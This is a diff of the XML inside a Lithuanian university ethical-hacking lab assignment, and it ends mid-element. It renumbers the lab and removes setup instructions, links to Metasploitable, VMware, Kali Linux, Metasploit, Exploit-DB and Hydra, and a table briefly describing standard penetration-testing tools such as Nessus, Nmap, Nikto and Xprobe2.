--- a/Saugos Magistro studijos/2 pusmetis/etinis isilauzimas antras laboratorinis.docx
+++ b/Saugos Magistro studijos/2 pusmetis/etinis isilauzimas antras laboratorinis.docx
@@ -396,7 +396,7 @@
         <w:rPr>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t>1</w:t>
+        <w:t>2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -676,46 +676,6 @@
           <w:lang w:val="lt-LT"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">STUTENTAS pildo gautus rezultatus </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>„Jūsų gautas rezultatas“</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>pažymėtose vietose</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -780,61 +740,7 @@
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t xml:space="preserve">ware (zip) failas </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Parsisiuntimas: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId7" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:strike/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>ftp://158.129.35.88/pub/CEH/metalinux.tgz</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:strike/>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (NEGALIOJA); </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Spustelėkite </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId8" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://sourceforge.net/projects/metasploitable/files/Metasploitable2/</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:color w:val="FF0000"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> saitą, kad atidarytumėte URL.</w:t>
+        <w:t>ware (zip) failas</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -858,33 +764,66 @@
         </w:rPr>
         <w:t xml:space="preserve">VMware Workstation Player (nemokama) </w:t>
       </w:r>
-      <w:hyperlink r:id="rId9" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>https://www.vmware.com/products/workstation-player.html</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> HYPERLINK "https://www.vmware.com/products/workstation-player.html" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
+        <w:t>https://www.vmware.com/products/workstation-player.html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:eastAsia="Arial"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Arial"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
         <w:t xml:space="preserve"> (arba Filehippo: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>https://filehippo.com/download_vmware-workstation-player/</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> HYPERLINK "https:</w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve">//filehippo.com/download_vmware-workstation-player/" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:eastAsia="Arial"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>https://filehippo.com/download_vmware-workstation-player/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:eastAsia="Arial"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Arial"/>
@@ -953,62 +892,56 @@
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t>(papildomai) Kali Linux – savarankiškai dirbantiems galima pasitelkti „pentest“ Linux distribuciją tam, kad turėti visus reikiamus įrankius vienoje vietoje (</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId11" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://www.kali.org</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t>Kali Linux –</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> P</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t>. Svarbu, jei planuojate naudoti Windows OS, galite įdiegti visą reikiamą aplinką per Windows App Store (nuo</w:t>
+        <w:t>asitelkt</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t>r</w:t>
+        <w:t>a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t xml:space="preserve">oda kaip tai padaryti: </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId12" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>https://www.kali.org/news/kali-linux-in-the-windows-app-store/</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:t xml:space="preserve"> „pentest“ Linux distribucij</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Arial"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tam, kad turėti visus reikiamus įrankius vienoje vietoje</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Arial"/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1113,771 +1046,37 @@
           <w:rFonts w:eastAsia="Arial"/>
           <w:lang w:val="lt-LT"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Sistema sukurta naudojant „Ruby“ programavimo kalbą, o išeinantys komponentai – įvairiomis kitomis kalbomis, pvz.: C, perl, assembler ir pan. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
+        <w:t>. Sistema sukurta naudojant „Ruby“ programavimo kalbą, o išeinantys komponentai – įvairiomis kitomis kalbomis, pvz.: C, perl, assembler ir pan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
           <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Parsisiųsti:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId13" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>https://www.metasploit.com</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> PASTABA: jei naudojate Kali Linux, Metasploit karkasas yra sudiegtas pagal nutylėjimą.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>Darbo atlikimo metodika</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pažeidžiamumų duomebų bazė </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId14" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://www.exploit-db.com</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Hydra - brutalios jėgos (brute foce) įrankis </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId15" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:eastAsia="Arial"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>https://github.com/vanhauser-thc/thc-hydra</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Galima naudoti ir šiame sąraše nepateiktą programinę įrangą.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="16"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Arial"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Braižymas (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>jei bus reikalinga</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">): </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId16" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="lt-LT"/>
-          </w:rPr>
-          <w:t>http://draw.io</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Papildom</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>os</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> darbo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> priemonės</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Pavadinimas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Trumpas apibūdinimas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>SING</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>įrankis, skirtas pakeisti įvairius ICMP paketo tipus</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>NESSUS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">Pažeidžiamumų skeneris su </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>papildymais</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Nmap / Netcat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Įvairiapusis tinklo jungties, skenavimo įrankis UDP ir TCP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Whisker 2.0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Tinklo skenavimo įrankis, parašytas PERL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Nikto</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Sudėtingesnis tinklo skenavimo įrankis, pagrįstas Whisker</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Fragrouter</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Paketas, pakeičiantis įrankį NIDS tikrinimui</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Nemesis</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Paketas, apipavidalinantis įrankį ugniasienių ir maršrutizatorių tikrinimui</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:t>Xprobe2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>Įrankis, pirštų atspaudų sistemoms su ICMP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:spacing w:after="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
